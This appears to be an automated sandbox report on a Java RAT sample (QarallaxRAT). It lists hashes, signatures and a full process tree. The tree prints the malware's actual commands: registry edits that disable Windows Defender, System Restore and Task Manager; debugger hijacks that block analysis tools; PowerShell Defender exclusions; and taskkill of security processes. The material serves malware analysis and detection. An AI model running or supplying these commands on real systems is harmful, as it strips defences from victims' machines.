Analysis

  • max time kernel
    63s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    26-06-2020 15:38

General

  • Target

    PO20200623.jar

  • Size

    406KB

  • MD5

    849ac004f76921b87bf21035f6b5e14b

  • SHA1

    af1c66fde1026618b9db019a979e082d22b69b2d

  • SHA256

    2b9e74db724cd836104a57ae1b4eff596ea093d65153734e3b7167e6923db3fd

  • SHA512

    fbbb369c9140d8383d604beeffb23111242d9608b77f9a2686462d7d693b96b157ad1167faa8d7e16000d546fe3b9cd6f31a02edba5acf2c1465762110660f3e

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • QarallaxRAT

    Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).

  • Qarallax RAT support DLL 1 IoCs
  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\Windows\system32\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\PO20200623.jar
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\system32\cmd.exe
      cmd.exe
      2⤵
        PID:296
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:536
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:796
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1656
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1100
      • C:\Windows\system32\attrib.exe
        attrib +h C:\Users\Admin\Oracle
        2⤵
        • Views/modifies file attributes
        PID:1688
      • C:\Windows\system32\attrib.exe
        attrib +h +r +s C:\Users\Admin\.ntusernt.ini
        2⤵
        • Views/modifies file attributes
        PID:1400
      • C:\Windows\system32\attrib.exe
        attrib -s -r C:\Users\Admin\PXBiH\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1804
      • C:\Windows\system32\attrib.exe
        attrib +s +r C:\Users\Admin\PXBiH\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1832
      • C:\Windows\system32\attrib.exe
        attrib -s -r C:\Users\Admin\PXBiH
        2⤵
        • Views/modifies file attributes
        PID:1844
      • C:\Windows\system32\attrib.exe
        attrib +s +r C:\Users\Admin\PXBiH
        2⤵
        • Views/modifies file attributes
        PID:1408
      • C:\Windows\system32\attrib.exe
        attrib +h C:\Users\Admin\PXBiH
        2⤵
        • Views/modifies file attributes
        PID:1220
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r C:\Users\Admin\PXBiH\qMaee.class
        2⤵
        • Views/modifies file attributes
        PID:1788
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\system32\reg.exe
          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
          3⤵
            PID:1888
          • C:\Windows\system32\reg.exe
            reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
            3⤵
              PID:2020
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
            2⤵
              PID:1592
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\PXBiH','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\PXBiH\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1640
            • C:\Windows\System32\taskkill.exe
              "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
              2⤵
              • Kills process with taskkill
              PID:1552
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
              2⤵
                PID:1556
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                2⤵
                  PID:1916
                • C:\Windows\System32\reg.exe
                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
                  2⤵
                    PID:1936
                  • C:\Windows\System32\reg.exe
                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                    2⤵
                      PID:1000
                    • C:\Windows\System32\reg.exe
                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                      2⤵
                        PID:2032
                      • C:\Windows\System32\reg.exe
                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                        2⤵
                          PID:1564
                        • C:\Windows\System32\reg.exe
                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
                          2⤵
                            PID:1072
                          • C:\Windows\System32\reg.exe
                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                            2⤵
                              PID:1516
                            • C:\Windows\system32\cmd.exe
                              cmd.exe
                              2⤵
                                PID:1524
                                • C:\Windows\system32\reg.exe
                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
                                  3⤵
                                    PID:1828
                                  • C:\Windows\system32\reg.exe
                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
                                    3⤵
                                      PID:1632
                                  • C:\Windows\System32\reg.exe
                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
                                    2⤵
                                      PID:656
                                    • C:\Windows\System32\reg.exe
                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                      2⤵
                                        PID:688
                                      • C:\Windows\System32\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                                        2⤵
                                          PID:568
                                        • C:\Windows\System32\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                          2⤵
                                            PID:1224
                                          • C:\Windows\System32\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                                            2⤵
                                              PID:1688
                                            • C:\Windows\System32\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                              2⤵
                                                PID:1788
                                              • C:\Windows\System32\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
                                                2⤵
                                                  PID:1636
                                                • C:\Windows\System32\taskkill.exe
                                                  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
                                                  2⤵
                                                  • Kills process with taskkill
                                                  PID:1872
                                                • C:\Windows\System32\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
                                                  2⤵
                                                    PID:1488
                                                  • C:\Windows\System32\reg.exe
                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                    2⤵
                                                      PID:596
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                      2⤵
                                                        PID:1888
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:1508
                                                        • C:\Windows\System32\reg.exe
                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                          2⤵
                                                            PID:1704
                                                          • C:\Windows\System32\taskkill.exe
                                                            "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
                                                            2⤵
                                                            • Kills process with taskkill
                                                            PID:1792
                                                          • C:\Windows\System32\reg.exe
                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                            2⤵
                                                              PID:560
                                                            • C:\Windows\System32\reg.exe
                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:784
                                                              • C:\Windows\System32\reg.exe
                                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                2⤵
                                                                  PID:1500
                                                                • C:\Windows\System32\reg.exe
                                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                  2⤵
                                                                    PID:1076
                                                                  • C:\Windows\System32\reg.exe
                                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                    2⤵
                                                                      PID:572
                                                                    • C:\Windows\System32\reg.exe
                                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                      2⤵
                                                                        PID:1072
                                                                      • C:\Windows\System32\reg.exe
                                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                        2⤵
                                                                          PID:1492
                                                                        • C:\Windows\System32\reg.exe
                                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                          2⤵
                                                                            PID:1344
                                                                          • C:\Windows\System32\reg.exe
                                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                            2⤵
                                                                              PID:1088
                                                                            • C:\Windows\System32\reg.exe
                                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                              2⤵
                                                                                PID:1520
                                                                              • C:\Windows\System32\reg.exe
                                                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                2⤵
                                                                                  PID:596
                                                                                • C:\Windows\System32\taskkill.exe
                                                                                  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                  2⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:656
                                                                                • C:\Windows\System32\taskkill.exe
                                                                                  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
                                                                                  2⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:560
                                                                                • C:\Windows\System32\taskkill.exe
                                                                                  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
                                                                                  2⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:1880
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  cmd.exe
                                                                                  2⤵
                                                                                    PID:288
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
                                                                                      3⤵
                                                                                        PID:2008
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1400
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1884
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1556
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1796
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1636
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1532
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:896
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1968
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1936
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1064
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:1220
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:704
                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                      "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:524

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v6

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads